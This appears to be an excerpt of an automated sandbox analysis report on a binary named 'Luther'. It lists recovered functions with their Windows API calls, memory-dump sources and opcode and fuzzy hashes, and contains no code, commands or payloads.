Opcode Fuzzy Hash: cc2331767f2c8e1184e50a6a6454516e81b2bc3aab11250722aba524d0654ed0
Instruction Fuzzy Hash: 48014C33620514AFCB059F99EC05CAE7B6EEB85370B24021AF811A7191EA71ED519BD0

Function 00E3F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 00E3F27B
DispatchMessageW.USER32(?), ref: 00E3F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E3F29F
Sleep.KERNEL32(0000000A), ref: 00E3F2B1
TranslateAcceleratorW.USER32(?,?,?), ref: 00E832D8

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 952916506e4fe37d0b9613884f465373b93a5268f80da1fa9b2e894ee7af904c
Instruction ID: af2da3cf457b24109940f9e9e05b922608afa32a8c586be5fb3504d5cab88fc8
Opcode Fuzzy Hash: 952916506e4fe37d0b9613884f465373b93a5268f80da1fa9b2e894ee7af904c
Instruction Fuzzy Hash: 83F05E30608344DBEB709BA0DC89FEA77ACAB84714F105939E20DA30E0DB71A588DB25

Function 00E3396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E33A3C

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: edc225de831ccac81e837fca1ff07017b455563bdb12a259874479f1c2581aba
Instruction ID: 0983e7f4e91c9fd2baccaba29675ddaef702a707d4a8ebc526171146465c2b5c
Opcode Fuzzy Hash: edc225de831ccac81e837fca1ff07017b455563bdb12a259874479f1c2581aba
Instruction Fuzzy Hash: E331A571604305DFD760DF34D889B97BBE8FB49309F00092EE6D9A7281E775A948CB52

Function 00E3331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00E3333D

Part of subcall function 00E332E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E332FB
Part of subcall function 00E332E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E33312

Part of subcall function 00E3338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E33368,?), ref: 00E333BB
Part of subcall function 00E3338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E33368,?), ref: 00E333CE
Part of subcall function 00E3338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F02418,00F02400,?,?,?,?,?,?,00E33368,?), ref: 00E3343A
Part of subcall function 00E3338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00F02418,?,?,?,?,?,?,?,00E33368,?), ref: 00E334BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00E33377

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: d3745b597a9acea2af5fcdad81458dd711a5fbaf42f4ed2e029b781418317734
Instruction ID: fa53f07a696a89afd9976d4a95625fc9e8210c533e0dc0480b56056daffda393
Opcode Fuzzy Hash: d3745b597a9acea2af5fcdad81458dd711a5fbaf42f4ed2e029b781418317734
Instruction Fuzzy Hash: 7BF054325587489FD7416F70EC0EF283BE4B704719F045816B519694F2DBBA4159EB50

Function 00E3CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00E3CEEE

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 7f06c59d9cfe63ccc78fdf03babb7a6bfa072447f8507f3ffe8cf370ed68d270
Instruction ID: c7518e6ab6e7ed10a86e9b125b704b8aa7588742c123b2e593514a75fa3d7ccf
Opcode Fuzzy Hash: 7f06c59d9cfe63ccc78fdf03babb7a6bfa072447f8507f3ffe8cf370ed68d270
Instruction Fuzzy Hash: 7132F574A00205DFCB14DF54C888ABABBF9FF45358F28A099E90ABB251C735ED42DB51

Function 00EB7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 0c302163bcfb4c385e8bb69c031331cc856504d08484aba7f260b33b5d07ade7
Instruction ID: 3e046fafdc011e0fe0048db6dbf57f4c84436e51e74e4f61d46f139f9658c8d3
Opcode Fuzzy Hash: 0c302163bcfb4c385e8bb69c031331cc856504d08484aba7f260b33b5d07ade7
Instruction Fuzzy Hash: 8AD15A74A04209EFCB14EF98D8819EEBBB5FF88314F145199E955BB291DB30AE41CF90

Function 00E5F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849963c2b42a8f3617a092bbf27bc30c83e0a511df0b9ae6ee9de50b4f60d2a3
Instruction ID: 05d2a492371f8a2252253ab9c77e3551e18e1aba8c92bd26aedcc8a6e56ae4b7
Opcode Fuzzy Hash: 849963c2b42a8f3617a092bbf27bc30c83e0a511df0b9ae6ee9de50b4f60d2a3
Instruction Fuzzy Hash: 7E511D79A00108AFDB10DF68C940BA97BE1EF85365F199978EC18BB3A2D731DD46CB50

Function 00E9FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00E9FCCE

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 0d22132e88b0486bd616bc6c31cbe8c64a70e76921ecba017c80010764587eda
Instruction ID: 683db55fe8b988292846e74dfc918deb0c7244958d147aa08f886375de306798
Opcode Fuzzy Hash: 0d22132e88b0486bd616bc6c31cbe8c64a70e76921ecba017c80010764587eda
Instruction Fuzzy Hash: 0A4183B6500209AFCF11DF68C881AAEB7F8EF44318B20953EE916E7251EB71DE45CB50

Function 00E36679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E3668B,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E3664A
Part of subcall function 00E3663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E3665C
Part of subcall function 00E3663E: FreeLibrary.KERNEL32(00000000,?,?,00E3668B,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E3666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E366AB

Part of subcall function 00E36607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E75657,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E36610
Part of subcall function 00E36607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E36622
Part of subcall function 00E36607: FreeLibrary.KERNEL32(00000000,?,?,00E75657,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E36635

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: cd410e038092597f0622149c05631d918a71e42485d5530cd2f3c07dbb7352c9
Instruction ID: f22e039e3896ff344093c4bfb173d8091601297405f59465ea1e495a3f4cf87e
Opcode Fuzzy Hash: cd410e038092597f0622149c05631d918a71e42485d5530cd2f3c07dbb7352c9
Instruction Fuzzy Hash: E211C472600205BACF14AB70CD0BBADBFE59F94755F20D82DF442BA1D2DEB19A05DB50

Function 00E68782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00E687C0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 8758cbeb748a34e3a32c14292e075b29cf1a07535912d1dd3234ad0afda65e62
Instruction ID: 9b82a0556039c2d16d88d37066a38576419acb2ba9bbfba7a566b7bb5ece5300
Opcode Fuzzy Hash: 8758cbeb748a34e3a32c14292e075b29cf1a07535912d1dd3234ad0afda65e62
Instruction Fuzzy Hash: F81148B290420AAFCB15DF58E94499A7BF4FF48300F104169F809AB311DA31EE118B64

Function 00E5E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: 53f1f5d4f31a7c8f72afc1a7ad1664d4eff4ac9c83bc5f4f7c956da3b1d17863
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: 8FF0F932500A1056D7363A26AC0579A33D98FC2376F106F55FD65B32D1DA70D90986D2

Function 00E3B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E3B333

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 49b5f3d2416b2b09249f62e531901035385350fe3fb11eec779d2002293d756d
Instruction ID: c3a1b1f14f92e4427e8f3e9cd911ade0f80b9fc42173d501d2de33d0923cfaac
Opcode Fuzzy Hash: 49b5f3d2416b2b09249f62e531901035385350fe3fb11eec779d2002293d756d
Instruction Fuzzy Hash: 6FF0C8B3601B146ED7149F28D906BA6BF98EB44360F10852AFA1ADB1D1DB71E514CBA0

Function 00EAF94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00EAF987

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 4eff348d2597e518c1e3eaea758277a42c99d6ff4b2065b4a6a2db0b4c21f71c
Instruction ID: 9540f3cea1405d5071e8ca66fb2e2e2079792027b6fff9cb852bac159a12cf31
Opcode Fuzzy Hash: 4eff348d2597e518c1e3eaea758277a42c99d6ff4b2065b4a6a2db0b4c21f71c
Instruction Fuzzy Hash: C4F03C72600204BFCB05EBA5DD4AE9FBBF8EF89720F005465F905BB261DA70BA45C761

Function 00E63B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00E56A79,?,0000015D,?,?,?,?,00E585B0,000000FF,00000000,?,?), ref: 00E63BC5

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d336aa4f136cf788ab68db40b921628aa9358ff2ab3af7bffed724a4ad568ff8
Instruction ID: 1de18ce9115dbcbd65c8cbe7f4c6f25d9a8cad1e3eb1dc147faf5dc439571bc7
Opcode Fuzzy Hash: d336aa4f136cf788ab68db40b921628aa9358ff2ab3af7bffed724a4ad568ff8
Instruction Fuzzy Hash: 73E0ED22680A20AADA202672BC05B9A3A88AF013E6F192120EC05B60A0CF60CE0082E0

Function 00E366E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea2ecde01b2694f3e2201675ed15b9459e22bd30e87c6b5ef267870646f8f572
Instruction ID: 332f25b1db01381af25f3e5f10997f04f52285c7bda1a22a115173ed0d9f2455
Opcode Fuzzy Hash: ea2ecde01b2694f3e2201675ed15b9459e22bd30e87c6b5ef267870646f8f572
Instruction Fuzzy Hash: 32F0A971005702DFCB348FB0D8A4852BBF0BF0032A324D9BEE1CAA6610C7729844CF10

Function 00E3684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00E36868

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 47fee37407858a4ad89f8f33729a2748fe9ce8e369a2bdc36c73e513e5799ac8
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 6CF0F87650020DFFDF09DF90C941E9EBBB9FB08318F209485F9159A251C376EA21EBA1

Function 00E33907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E33963

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 2f4d4e7c9771ca75bfb1e3a13e1f9b8dbd55e93bf6ad02d97885be045720ae08
Instruction ID: f8240704c4ec67acba1aa896e34d68715d0c0a4feadd06adad2a3c244ac79acd
Opcode Fuzzy Hash: 2f4d4e7c9771ca75bfb1e3a13e1f9b8dbd55e93bf6ad02d97885be045720ae08
Instruction Fuzzy Hash: B6F037709143189FE7929F24DC4DBD57BFCB70170CF0040A9A644A6185D7755788CF51

Function 00E33A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E33A76

Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 1d0ec9d5662a36e50bd0cef8ab8cc97a771c660e8c94009df7bd5f875277410c
Instruction ID: 198be75bb5d61440374fedb884fc611ed4155bf5337b0a78adffcdbcf7a482e3
Opcode Fuzzy Hash: 1d0ec9d5662a36e50bd0cef8ab8cc97a771c660e8c94009df7bd5f875277410c
Instruction Fuzzy Hash: F5E0CD729002245BC71092589C05FDA77DDDFC8790F044075FD09E7254D961ED80C690

Function 00E7071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00E70A84,?,?,00000000,?,00E70A84,00000000,0000000C), ref: 00E70737

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 34b7ec76135c882b436d3cf0f42d868ddc19b40e938302df85d5ef4a1098b87d
Instruction ID: db73249d54b6de5aba0649beada98b81c1122afe46a296b5794a5e11cb3ea31a
Opcode Fuzzy Hash: 34b7ec76135c882b436d3cf0f42d868ddc19b40e938302df85d5ef4a1098b87d
Instruction Fuzzy Hash: 5FD06C3200010DBFDF028F85DD06EDA3BAAFB48714F014010BE5866020C732E822AB90

Function 00E9EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00E9D840), ref: 00E9EAB1

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 577efb24877e8c1b1d36f8ca48d8e2f0d153ca8d872c421bc0da9870ae5d92e2
Instruction ID: a1688fa5279e670f54bef059ae5c6b01054fae96b3c400a6296dd5f00da47183
Opcode Fuzzy Hash: 577efb24877e8c1b1d36f8ca48d8e2f0d153ca8d872c421bc0da9870ae5d92e2
Instruction Fuzzy Hash: 8BB0923400460009AD284A385A0B999330079423A97DC2BD0E579A52F2C3BA980FA950

Function 00EA664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00E9DC54: FindFirstFileW.KERNEL32(?,?), ref: 00E9DCCB
Part of subcall function 00E9DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9DD1B
